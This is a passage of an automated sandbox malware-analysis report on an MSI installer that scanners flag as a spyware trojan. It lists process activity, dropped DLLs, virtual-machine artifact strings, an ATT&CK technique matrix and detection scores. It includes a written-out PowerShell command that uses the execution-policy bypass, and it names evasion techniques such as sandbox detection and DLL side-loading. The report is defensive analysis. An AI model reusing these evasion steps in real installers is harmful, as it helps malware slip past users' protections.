Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe

Code function: 7_2_00007FF6456906F0 rdtsc

7_2_00007FF6456906F0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3627			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6158			Jump to behavior

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Dropped PE file which has not been started: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIE184.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIE0C6.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\appData\xmpp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Dropped PE file which has not been started: C:\ProgramData\Chrome\Application\118.0.5993.120\vulkan-1.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\appData\vcomp140_app.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\appData\mrt100_app.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\appData\vcamp140_app.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIE164.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIE62B.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\appData\vccorlib140_app.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Dropped PE file which has not been started: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_elf.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIE1F2.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIE134.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

API coverage: 1.7 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7724	Thread sleep count: 3627 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7728	Thread sleep count: 6158 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Code function: 5_2_00007FFDFBA4A230 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,

5_2_00007FFDFBA4A230

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Amcache.hve.13.dr	Binary or memory string: VMware
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: powershell.exe, 00000003.00000002.1813041601.0000000006DEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Amcache.hve.13.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: powershell.exe, 00000003.00000002.1806669979.000000000075F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.13.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.13.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: powershell.exe, 00000003.00000002.1813429164.0000000006E7B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.13.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe

Code function: 7_2_00007FF6456906F0 rdtsc

7_2_00007FF6456906F0

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Code function: 5_2_00007FF625A140E0 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

5_2_00007FF625A140E0

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Code function: 5_2_00007FF625A12AA0 LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,

5_2_00007FF625A12AA0

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Code function: 5_2_00007FF625A17A60 SetLastError,GetProcessHeap,HeapFree,

5_2_00007FF625A17A60

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe

Code function: 7_2_00007FF6457AD548 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

7_2_00007FF6457AD548

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: ust_019821730-0576383.msi, type: SAMPLE
Source: Yara match	File source: amsi32_7644.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7644, type: MEMORYSTR
Source: Yara match	File source: C:\Config.Msi\67df31.rbs, type: DROPPED
Source: Yara match	File source: C:\Windows\Installer\MSIE280.tmp, type: DROPPED
Source: Yara match	File source: C:\Windows\Installer\67df2f.msi, type: DROPPED

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE6C5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE6C1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE6C2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE6C3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE6C5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE6C1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE6C2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE6C3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe "C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe"			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\psse6c5.ps1" -propfile "c:\users\user\appdata\local\temp\msie6c1.txt" -scriptfile "c:\users\user\appdata\local\temp\scre6c2.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scre6c3.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\psse6c5.ps1" -propfile "c:\users\user\appdata\local\temp\msie6c1.txt" -scriptfile "c:\users\user\appdata\local\temp\scre6c2.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scre6c3.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."			Jump to behavior

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Code function: ___lc_locale_name_func,GetLocaleInfoEx,

5_2_00007FFDFBA6FAE0

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Code function: 5_2_00007FF625A11954 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

5_2_00007FF625A11954

Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe

Code function: 7_2_00007FF6457666E0 GetVersionExW,GetProductInfo,GetNativeSystemInfo,

7_2_00007FF6457666E0

Source: Amcache.hve.13.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	1 Command and Scripting Interpreter	1 DLL Side-Loading	11 Process Injection	21 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	141 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	11 Peripheral Device Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	25 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ust_019821730-0576383.msi	29%	ReversingLabs	Win64.Trojan.SpywareX
ust_019821730-0576383.msi	37%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.14	0%	ReversingLabs
C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.14	0%	Virustotal		Browse
C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.50	0%	ReversingLabs
C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.50	0%	Virustotal		Browse
C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	0%	ReversingLabs
C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	0%	Virustotal		Browse
C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_pwa_launcher.exe	0%	ReversingLabs
C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_pwa_launcher.exe	0%	Virustotal		Browse
C:\ProgramData\Chrome\Application\118.0.5993.120\vulkan-1.dll	0%	ReversingLabs
C:\ProgramData\Chrome\Application\118.0.5993.120\vulkan-1.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	0%	ReversingLabs
